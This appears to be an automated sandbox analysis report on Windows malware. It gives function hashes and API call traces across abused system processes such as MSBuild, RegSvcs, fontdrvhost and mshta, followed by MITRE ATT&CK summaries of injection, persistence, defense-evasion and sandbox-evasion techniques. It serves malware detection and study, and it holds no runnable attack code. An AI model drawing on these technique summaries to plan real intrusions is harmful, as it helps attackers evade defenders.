SetErrorMode.KERNELBASE(?), ref: 010FA290

Memory Dump Source

Source File: 00000008.00000002.2524221441.00000000010FA000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10fa000_RegSvcs.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 884cdee5d0857c1536ce8c3b57836945cc9dda1ca06f2e0bf21896bd69d76436
Instruction ID: 3209cfc4f20cdc4668c3173af1ecedd1431cb7e0d4cae9d3931788b3b4dfab3e
Opcode Fuzzy Hash: 884cdee5d0857c1536ce8c3b57836945cc9dda1ca06f2e0bf21896bd69d76436
Instruction Fuzzy Hash: E3F0A435A04240CFDB51CF09D885765FBE0EF48620F08C09ADE494BB52D276E408CEB2

Function 012705DF Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2525611679.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1270000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c64c126cd313109605ea7665f09d74c51a8f7d8693d3c164e09800b28a17dda
Instruction ID: 5215316c6acc6bb1bbae2a141117fb1197a0afda1ee3ff36fa28229256777fc0
Opcode Fuzzy Hash: 4c64c126cd313109605ea7665f09d74c51a8f7d8693d3c164e09800b28a17dda
Instruction Fuzzy Hash: 8A0186B65097805FD7128F15AC40862FFE8EE86630749C59BE8498B752D235B908C7B2

Function 01270606 Relevance: .0, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2525611679.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1270000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03122447a908f1f9b446ae46ef7334e9e8ea0ed19824e80ac866700b31fa02ef
Instruction ID: f7c159616f7112b0b3f2051b75f631adde6b37e68ab866c2e2592f2a171e6957
Opcode Fuzzy Hash: 03122447a908f1f9b446ae46ef7334e9e8ea0ed19824e80ac866700b31fa02ef
Instruction Fuzzy Hash: 9DE092B66046404F9650DF0AEC41452F7D8EB88630708C07FDC0D8B701D275B509CAA6

Function 010F23F4 Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2524172126.00000000010F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10f2000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d24ade8feb55b4831be50ec71e287a5fea3d032853f3284deeea1a95a4c2da8f
Instruction ID: d68ca06847dbd43b4130787048a9b8dd7e437c0c5460104d3f415531b372ec89
Opcode Fuzzy Hash: d24ade8feb55b4831be50ec71e287a5fea3d032853f3284deeea1a95a4c2da8f
Instruction Fuzzy Hash: 3ED02E392046C04FE3138A0CC2A9B853BE4AB40708F0A00FEA8808BB63CBA8E4C0D600

Function 010F23BC Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2524172126.00000000010F2000.00000040.00000800.00020000.00000000.sdmp, Offset: 010F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10f2000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba490dc18e35c9654c29599ff2242cc61d84f0c69ca472e958df36d1c8e787a2
Instruction ID: 6d7104fb727cfe4dfc34e61ddf58fa8d343ebd45a13c5d1b0df5f9b8989117fb
Opcode Fuzzy Hash: ba490dc18e35c9654c29599ff2242cc61d84f0c69ca472e958df36d1c8e787a2
Instruction Fuzzy Hash: 09D05E746406814FD719DA0CC2D5F593BD4AB44714F0684ECAD508BB62C7A4E9C4DA00

Analysis Process: MSBuild.exePID: 8044, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0175A230 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 0175A290

Memory Dump Source

Source File: 00000009.00000002.2524973747.000000000175A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_175a000_MSBuild.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 90bac6fc9274a9a22c4278418f52afb933a1838e46dc4c8895b3d03052da915e
Instruction ID: dfa08e95b8b235a28908e1f651679217039fcb7eeb57c61103e00cfce67501c8
Opcode Fuzzy Hash: 90bac6fc9274a9a22c4278418f52afb933a1838e46dc4c8895b3d03052da915e
Instruction Fuzzy Hash: 4A116D7140D3C49FDB128B15DC55A62BFB4DF47624F0880DAED848F663C2756808DB72

Function 0175A25E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 0175A290

Memory Dump Source

Source File: 00000009.00000002.2524973747.000000000175A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0175A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_175a000_MSBuild.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cb85f9439313bf87f3750e4168d7fadde8fb110ae797b697caf87308bb900450
Instruction ID: 9dc33ee5b3cf9e80f850a22711ec36948ea678b4af3b17b72a2a9c7ba43ce225
Opcode Fuzzy Hash: cb85f9439313bf87f3750e4168d7fadde8fb110ae797b697caf87308bb900450
Instruction Fuzzy Hash: B0F0A4759083448FDB51CF05D985761FBE0DF48720F08C1AADD454B752D3B6A448CEA2

Function 016F05E3 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2524787063.00000000016F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_16f0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7731fb970013b6d41de41d3f1a62b37d844790cece4ae56a4ab90bfd6310a9c
Instruction ID: 4de202e6e11ff511f923e27efdaefe9bb946b775641c396fba79e093d1a576fc
Opcode Fuzzy Hash: d7731fb970013b6d41de41d3f1a62b37d844790cece4ae56a4ab90bfd6310a9c
Instruction Fuzzy Hash: 230186B650D7806FD7118F059C41862FFE8DF86620709C49FE8498BA52D275B909CB72

Function 016F0606 Relevance: .0, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2524787063.00000000016F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_16f0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7376dc36c2f6033cef92c25c187c1098fcb56ab4fd2e1fb911524c7ad7f00be
Instruction ID: 920bbeb1712c44b94e44520c78c54c1f1a7570dd532bc63c7b0c32083917ce47
Opcode Fuzzy Hash: c7376dc36c2f6033cef92c25c187c1098fcb56ab4fd2e1fb911524c7ad7f00be
Instruction Fuzzy Hash: 35E092B6A046004BD650CF0AEC81452F7D8EB84630708C07FDC0D8BB01D275B508CAB6

Function 017523F4 Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2524933516.0000000001752000.00000040.00000800.00020000.00000000.sdmp, Offset: 01752000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1752000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a23dfa771fd6482df98a635aead7b89ca7e7ef1ee4d00b0477c8ea57add7af
Instruction ID: b03b082207fd9e989ad8be611f1370d9974156ea9be55c86ea65fabfcadca457
Opcode Fuzzy Hash: 12a23dfa771fd6482df98a635aead7b89ca7e7ef1ee4d00b0477c8ea57add7af
Instruction Fuzzy Hash: 3ED02E393047C08FE3128A0CC2A8B853FE4AB40708F0A00F9AC008B763CBB8E880D640

Function 017523BC Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2524933516.0000000001752000.00000040.00000800.00020000.00000000.sdmp, Offset: 01752000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1752000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca5d58911b0a0adf62121e69fca841f47cb2ac9436bd70dc86927670c9b85343
Instruction ID: e9e8921e37d792eb6ec2a747f864db4dead011314bf61e334c4a95dc31c911ee
Opcode Fuzzy Hash: ca5d58911b0a0adf62121e69fca841f47cb2ac9436bd70dc86927670c9b85343
Instruction Fuzzy Hash: EBD05E342402818FD759DA0CC2D4F597BD4AB44714F0644ECAC108B763C7B4E9C0DA00

Analysis Process: MSBuild.exePID: 8072, Parent PID: 7272COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 009AA230 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 009AA290

Memory Dump Source

Source File: 0000000A.00000002.2525026589.00000000009AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9aa000_MSBuild.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: d4126538b2bb0929c575b73a98660f4bea2d83bce75e5bcc0a13319fbf50e060
Instruction ID: 59cfb3faf2fdf953151896d5323036aee8d557e86cb856219342718c0ae97ac0
Opcode Fuzzy Hash: d4126538b2bb0929c575b73a98660f4bea2d83bce75e5bcc0a13319fbf50e060
Instruction Fuzzy Hash: 70118F714093C09FDB128B15DC54B62BFB4DF47624F0884CAEDC48F263D2656908DBB2

Function 009AA25E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 009AA290

Memory Dump Source

Source File: 0000000A.00000002.2525026589.00000000009AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 009AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9aa000_MSBuild.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a32ad154e6b3643f5ae82e30e5786935fb2066dbcaf35d50f185544fd5e65b96
Instruction ID: c51191a2650547972e9bbb1c6169dee56d7a31d4c006e32dac27904c4fa91c94
Opcode Fuzzy Hash: a32ad154e6b3643f5ae82e30e5786935fb2066dbcaf35d50f185544fd5e65b96
Instruction Fuzzy Hash: F7F0AF759042408FDB20CF46D888761FBE4EF09720F08C49ADD494B752D37AA958CEE2

Function 009705E0 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2524903676.0000000000970000.00000040.00000020.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_970000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 456cbe834db32bfa47976d4a356d657a424d9cc53a32d7e4ebfaffd1e467dc7c
Instruction ID: 86d9c1b9c9c01f9b79878b402cebc68beb6f3e3b9626a609c49548442fa135c2
Opcode Fuzzy Hash: 456cbe834db32bfa47976d4a356d657a424d9cc53a32d7e4ebfaffd1e467dc7c
Instruction Fuzzy Hash: 4A01D6B55083805FC3128B56AC41853FFE8DF4623070984ABE8898B652D239B919CBB2

Function 00970606 Relevance: .0, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2524903676.0000000000970000.00000040.00000020.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_970000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac296a4e9109d04a94073d9fbd2517172f4835560aadf1b45f8ac6896e32ebde
Instruction ID: 48d8d790c80a8958819a6c46ea356e667e4fc85f58e7f04924b8953d269036e8
Opcode Fuzzy Hash: ac296a4e9109d04a94073d9fbd2517172f4835560aadf1b45f8ac6896e32ebde
Instruction Fuzzy Hash: A4E092B66046004BD650CF0BFC81462F7D8EF84630708C47FDC0D8B701E675B908CAA6

Function 009A23F4 Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2524987256.00000000009A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9a2000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844e93aa5126c4b2768580827c9d2f79454b300e681622f02bd53c6ece52c23a
Instruction ID: 4c6473b2e29e9308a99d9bd6d7b770caaee66b795173da7eea33b9a520abeabe
Opcode Fuzzy Hash: 844e93aa5126c4b2768580827c9d2f79454b300e681622f02bd53c6ece52c23a
Instruction Fuzzy Hash: 11D05E792497C14FD3169B1CC2A8B9537D8AB5A718F4A44F9A8408B773CB68E981D640

Function 009A23BC Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2524987256.00000000009A2000.00000040.00000800.00020000.00000000.sdmp, Offset: 009A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9a2000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9209b0f00f3588cb5ef7b566a3628775884624a4e8d9aa5e3330514e7b308c22
Instruction ID: c18b2f6c06829b355cb0563a495b066bd612d756c28adc627862cee7cc6b2b38
Opcode Fuzzy Hash: 9209b0f00f3588cb5ef7b566a3628775884624a4e8d9aa5e3330514e7b308c22
Instruction Fuzzy Hash: 57D05E342402814FCB19DB0DC2D4F5937D8AB46B18F0644E8AC108B762CBA8E9C0DA40

Analysis Process: fontdrvhost.exePID: 5808, Parent PID: 2596COMMON

Executed Functions

Function 00F702D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00F70326

Part of subcall function 00F700A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F700CD
Part of subcall function 00F700A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F70279

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00F70378
VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 00F703E7
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F70407
MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 00F7042E
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00F70456
CloseHandle.KERNELBASE(?), ref: 00F70471

Strings

,, xrefs: 00F70356

Memory Dump Source

Source File: 00000010.00000003.2376553071.0000000000F70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_f70000_fontdrvhost.jbxd

Similarity

API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
String ID: ,
API String ID: 3867569247-3772416878
Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
Instruction ID: 5045a09392717111a7f4a6c4b18eecd442bd10f301b760fefd22a9ecc3e2abe0
Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
Instruction Fuzzy Hash: 1C610DB1D00209EFDB10DFA5C884E9EBBB9FF08364F14C52AFA59A7240D734A940DB61

Function 00F700A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F700CD
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F70279

Memory Dump Source

Source File: 00000010.00000003.2376553071.0000000000F70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_f70000_fontdrvhost.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: 87ca40dc5ce4ecadfc690093896cc7509a245f6b37bd4eaab7b88577f1180703
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: E571AD72E04249DFDB41CF98C885BEDBBF0AF09314F248096E465FB241C674AA91EF65

Analysis Process: fontdrvhost.exePID: 4092, Parent PID: 2596COMMON

Executed Functions

Function 00F702D8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 169memoryfileCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00F70326

Part of subcall function 00F700A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F700CD
Part of subcall function 00F700A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F70279

VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00F70378
VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 00F703E7
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F70407
MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 00F7042E
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00F70456
CloseHandle.KERNELBASE(?), ref: 00F70471

Strings

,, xrefs: 00F70356

Memory Dump Source

Source File: 00000011.00000003.2382622563.0000000000F70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_f70000_fontdrvhost.jbxd

Similarity

API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
String ID: ,
API String ID: 3867569247-3772416878
Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
Instruction ID: 5045a09392717111a7f4a6c4b18eecd442bd10f301b760fefd22a9ecc3e2abe0
Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
Instruction Fuzzy Hash: 1C610DB1D00209EFDB10DFA5C884E9EBBB9FF08364F14C52AFA59A7240D734A940DB61

Function 00F700A4 Relevance: 2.7, APIs: 2, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 00F700CD
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00F70279

Memory Dump Source

Source File: 00000011.00000003.2382622563.0000000000F70000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_f70000_fontdrvhost.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction ID: 87ca40dc5ce4ecadfc690093896cc7509a245f6b37bd4eaab7b88577f1180703
Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
Instruction Fuzzy Hash: E571AD72E04249DFDB41CF98C885BEDBBF0AF09314F248096E465FB241C674AA91EF65

Analysis Process: mshta.exePID: 6672, Parent PID: 1044COMMON

Executed Functions

Function 00000219CB0F0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.2549156513.00000219CB0F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000219CB0F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_219cb0f0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: f4abf4cf4e2abd1f2ba7e816e9f380c02c212b76b7eeabe058b4f9d00fad57a4
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: F790022459640655D42455910C5969C6144639C190FD44481455790548E44D02DA1192

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
